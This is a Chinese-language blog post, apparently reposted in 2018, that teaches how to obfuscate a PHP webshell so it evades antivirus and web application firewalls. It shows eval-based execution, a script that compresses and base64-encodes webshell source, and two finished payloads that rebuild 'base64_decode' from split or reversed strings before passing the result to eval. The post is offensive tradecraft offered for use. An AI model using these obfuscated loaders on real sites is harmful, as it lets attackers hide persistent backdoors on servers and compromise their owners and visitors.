php大馬免殺技巧 | bypass waf
阿新 • • 發佈:2018-07-27
services echo php代碼 關鍵字 eva net con 執行 代碼
Part 1 前言
Part 2 免殺
執行代碼
eval 或 preg_replace的/e修飾符來執行大馬代碼。
$a = ‘phpinfo();‘; eval($a); //eval執行php代碼
編碼
如果直接去執行代碼,是過不了waf的,我們一般需要將大馬源碼進行編碼。
eval_gzinflate_base64類型加密與解密:
http://www.zhuisu.net/tool/phpencode.php
https://www.mobilefish.com/services/eval_gzinflate_base64/eval_gzinflate_base64.php
自己寫腳本加密:
$code= file_get_contents(‘D:\phpStudy\WWW\Test\Zlib\help.txt‘); //大馬源碼路徑 $encode = base64_encode(gzdeflate($code)); //加密函數自己修改就行 echo $encode; //輸出加密後代碼
解碼
通過解碼執行我們的代碼。
<?php //加密的代碼 eval(gzinflate(base64_decode(‘S03OyFdQ8shUKLbMTVOyBgA=‘))); ?>
關鍵字免殺
// 類型這樣的關鍵字如果沒有混淆拆分是過不了waf的 eval(gzinflate(base64_decode // 我們需要做的就是關鍵字免殺
免殺 payload
<?php $l=‘baSe6‘; $o=‘4_dE‘; $v=‘cO‘; $e=‘DE‘; $love=$l.$o.$v.$e; $c = "love"; $a=$$c(‘源碼base64加密‘); eval($a); ?> <?php $a = strrev(‘EdOcEd_46eSaB‘); $b= $a(‘源碼base64加密‘); eval($b); ?>
php大馬免殺技巧 | bypass waf